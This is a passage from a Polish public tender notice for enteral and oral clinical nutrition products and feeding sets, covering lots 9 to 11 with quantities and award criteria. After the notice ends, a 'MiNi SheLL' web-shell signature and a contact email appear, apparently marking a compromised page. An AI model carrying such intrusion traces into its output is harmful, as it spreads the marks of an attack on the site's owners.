4	Dieta kompletna w płynie, polimeryczna, hiperkaloryczna (1,5 kcal/ml), oparta o tłuszcze MCT, o smaku neutralnym (bez dodatków smakowych), do podaży doustnej lub przez zgłębnik, oparta na białku źródło: serwatka, kazeina, soja i groch ( 6g/100ml 16% energii) l oraz z zawartością DHA+EPA 0,34g	płyn 	1000ml	272
5	Dieta kompletna, hiperkaloryczna, wysokobiałkowa, wysokoenergetyczna, (źródłem białka serwatka i kazeina). Produkt przeznaczony do postępowania dietetycznego w przypadku niedożywienia związanego z chorobą.  Różne smaki. 	płyn	200ml	1000
6	Dieta kompletna, normokaloryczna, bezresztkowa, peptydowa, źródło węglowodanów stanowią maltodekstryny, niskotłuszczowa, tłuszcze zawierają średniołańcuchowe trójglicerydy  MCT. Produkt płynny przeznaczony do podawania doustnego lub przez zgłębnik. 	płyn	1000ml	268
7	Dieta kompletna, normokaloryczna, bogatoresztkowa, źródłem węglowodanów są wolno wchłanialne maltodekstryny, dieta normalizująca glikemię. Produkt płynny przeznaczony do podawania doustnego lub przez zgłębnik. 	płyn	1000 ml	640
8	Dieta kompletna, normokaloryczna, wysokobiałkowa, źródłem węglowodanów są wolno wchłaniane maltodekstryny. Głównym źródłem białka jest białko kazeinowe. Wspomaga leczenie ran. Produkt płynny przeznaczony do podawania doustnego lub przez zgłębnik. 	płyn	1000g	130
9	Dieta kompletna, polimeryczna, normokaloryczna (1kcal/ml), o smaku neutralnym (bez dodatków smakowych) do podaży doustnej lub przez zgłębnik, oparta na białku źródło: serwatka, kazeina, soja i groch (min 4g/100ml), oparta tylko na tłuszczach MCT (min 3,9g/100ml w tym 35% Energii), osmolarność 255 mOsm/l. Klinicznie wolna od laktozy  O zawartości żelaza nie mniejszym niż 1,6 mg na 100ml oraz z zawartością DHA+EPA 0,34g	płyn	1000ml	1000
10	dieta normalizująca glikemię, normokaloryczna (1,04kcal/ml), nie zawiera sacharozy, zwiększona zawartość przeciwutleniaczy (wit C i E , karoteniodów, selenu), zwiększona zawartość witamin z grupy  B, mieszanka 6 rodzajów błonnika, bezglutenowa, zawartość białka 4,9g/100ml, węglowodany 11,7g/100ml, o osmolarnośco 365mOsmol/l, o smakch truskawkowy, waniliowy	płyn	200 ml	300
11	Dieta normokaloryczna (1 kcal/1ml), oparta na białku źródło: serwatka, kazeina, soja i groch (min 4g/100ml), oparta tylko na tłuszczach MCT (min 3,9g/100ml w tym 34% Energii), zawierająca 6 rodzajów błonnika, bezglutenowa, bezlaktozowa. Osmolarność nie większa niż 250 mOsm/l	płyn	1000ml	56
12	Dieta wspomagająca leczenie odleżyn i ran, kompletna, bezresztkowa, hiperkaloryczna(1,28kcal/ml, bezglutenowa, zawierająca argininę, zwiększona zawartość przeciwutleniaczy(wit C i E, karotenoidów, cynku), zawartość białka 10g/100ml, niska zawartość tłuszczu 3,5g/100ml, węglowodany 14,2g/100ml, osmolarność min.500mOsmol/l ; smak truskawkowy, czekoladowy	płyn	200 ml	300
13	Dieta wysokobiałkowa, bogatoresztkowa, kompletna, hiperkaloryczna. Głównym źródłem białka kazeina. Produkt płynny przeznaczony do podawania doustnego lub przez zgłębnik. 	płyn	500 ml	806
14	Dietetyczny środek spożywczy specjalnego przeznaczenia medycznego służący do zagęszczania posiłków; zawiera gumę ksantanową, gumę guar oraz maltodekstryny; szybko i skutecznie zagęszcza napoje oraz pokarmy nie zmieniając ich koloru, zapachu i smaku.	proszek	opak. 175 g	3
15	klarowny preparat płynny na bazie meltodekstryn do stosowania u pacjentów chirurgicznych, zawiera węglowodany i elektrolity, przedoperacyjne nawadnianie zmniejszajace stres przedoperacyjny i zapobiegający pooperacyjnej insulinooporności	płyn	op. 4 x 200 ml	100
16	Płyn doustny Białko 2,6 g/100 ml (w tym: kazeina 1 g/100 ml, białka serwatkowe 1,6 g/100 ml, glutaminan 0,57 g/100 ml). Węglowodany 10,3 g/100 ml (w tym laktoza 5,4 g/100 ml). Tłuszcz 5,4 g/100 ml. Składniki mineralne. Witaminy. Wzbogacony w cholinę, taurynę, L-karnitynę, inozytol i nukleotydy. Osmolarność 295 mOsmol/l. Wartość energetyczna 101 kcal/100 ml (420 kJ/100 ml). 800 ml 	płyn	op.4 x 200 ml	40
17	Zestaw do podawania wymienionych diet metodą grawitacyjną lub za pomocą pompy ( wg potrzeb )	przyrząd	szt	2000
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>33692000-7, 33692210-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin płatności</td><td>20</td></tr><tr><td>Termin termin dostawy</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Uwagi:
1. wszystkie produkty muszą być oznaczone znakiem CE.
2. wszystkie preparaty dodawane do oferowanych płynów stosowanych w żywieniu pozajelitowym muszą być zgodne pod względem recepturowym.

<br /></div></div><br /></div><div><b>Część nr: </b>10
                  
                <b>Nazwa: </b><br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	Kompletna dieta do żywienia dojelitowego, wysokokaloryczna 2 kcal/ml, bogatobiałkowa - co najmniej 20% energii białkowej, zawierająca białko mleka, tłuszcze MCT/LCT i -3 kwasy tłuszczowe, bogatoresztkowa, o osmolarności do 395 mosmol/l, w worku zabezpieczonym samozasklepiającą się membraną o objętości 500 ml	płyn	500 ml	100
2	Kompletna dieta specjalistyczna, wysokoenergetyczna (1,3 kcal/ml), o zwiększonej zawartości aminokwasów rozgałęzionych, przeznaczona do żywienia dojelitowego przez zgłębnik. Zawiera błonnik oraz MCT. Nie zawiera glutenu, klinicznie wolna od laktozy. Do postępowania dietytycznego u osób zagrożonych niedożywieniem lub niedożywionych, w szczególności z ostrymi i przewlekłymi zaburzeniami czynności wątroby.	płyn	500 ml	100
3	Specjalistyczna dieta do żywienia dojelitowego, o dużej zawartości glutaminy 6g/100ml, bogata w antyoksydanty, zawierająca trybutyrynę, bezresztkowa, w worku zabezpieczonym samozasklepiającą się membraną o objętości 500 ml.	płyn	500 ml	50
4	Zestaw do podawania wymienionych diet metodą grawitacyjną lub za pomocą pompy ( wg potrzeb )	przyrząd	Szt	250
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>33692000-7, 33692210-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena </td><td>60</td></tr><tr><td>Termin płatności</td><td>20</td></tr><tr><td>Termin dostawy </td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Uwagi:
1. wszystkie produkty muszą być oznaczone znakiem CE.
2. wszystkie preparaty dodawane do oferowanych płynów stosowanych w żywieniu pozajelitowym muszą być zgodne pod względem recepturowym.

<br /></div></div><br /></div><div><b>Część nr: </b>11
                  
                <b>Nazwa: </b><br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1	Dieta normokaloryczna z dodatkiem błonnika (rozpuszczalny 100%), kompletna pod względem odżywczym. Źródłem białka jest kazeina i serwatka. Osmolarność 187 mOsm/l. Dla pacjentów z zaburzeniami metabolizmu glukozy. Opakowanie butelka SmartFlex 500 ml.	płyn	op. 500 ml	100
2	Dieta kompletna pod względem odżywczym, normokaloryczna i normobiałkowa, płynna dieta peptydowa  100 % białko serwatkowe, zawartość kwasów tłuszczowych MCT  70%, o osmolarności 200 mOsm/l. Do podawania doustnie lub przez zgłębnik. Opakownie typu butelka SmartFlex. 	płyn	op. 500 ml	70
3	Dieta wysokoenergetyczna (1,5 kcal/ml), kompletna pod względem odżywczym dla dzieci powyżej 1. roku życia. Smak waniliowy i truskawkowy. Osmolarność 346 mOsm/l. Opakowanie typu butelka 200 ml.	płyn	op. 200 ml	40
4	Dieta normokaloryczna (1 kcal/ml), zawierająca nukleotydy, kwasy tłuszczowe omega-3 i argininę oraz MCT. Źródłem białka jest kazeina, wolna arginina. Kompletne pod względem odżywczym immunożywienie. Do podawanie doustnie lub przez zgłębnik. Osmolarność 298 mOsm/l. Opakowanie  butelka SmartFlex 500 ml.	płyn	op. 500 ml	60
5	Dieta hiperkaloryczna (1,3 kcal/1ml), wysokobiałkowa (6,7 g/100 ml), ubogo resztkowa, kompletna pod względem odżywczym. Jedynym źródłem białka jest białko kazeinowe. Min 21% energii pochodzi z  białka, 30 % energii pochodzi z tłuszczy, a min. 49% energii pochodzi z węglowodanów. Zawierająca tłuszcze MCT 20%. Osmolarność  283 mOsm/l. Produkt przeznaczony do podawania doustnego lub przez zgłębnik. Opakowanie  butelka SmartFlex 500 ml	płyn	op. 500 ml	60
6	Dieta normokaloryczna, ubogoresztkowa, kompletna pod względem odżywczym. Jedynym źródłem białka jest białko kazeinowe. Min. 16% energii pochodzi z  białka, 30% energii pochodzi z tłuszczy a 54% energii pochodzi z węglowodanów. Zawierająca 20% tłuszczy MCT. Osmolarność:  236 mOsm/l. Produkt przeznaczony do podawania doustnego lub przez zgłębnik. Opakowanie  butelka SmartFlex 1000 ml. 	płyn	op. 1000 ml	100
7	Zestaw do podawania wymienionych diet metodą grawitacyjną lub za pomocą pompy ( wg potrzeb )	przyrząd	Szt	400
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>33692000-7, 33692210-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena </td><td>60</td></tr><tr><td>Termin płatności</td><td>20</td></tr><tr><td>Termin dostawy </td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Uwagi:
1. wszystkie produkty muszą być oznaczone znakiem CE.
2. wszystkie preparaty dodawane do oferowanych płynów stosowanych w żywieniu pozajelitowym muszą być zgodne pod względem recepturowym.

<br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com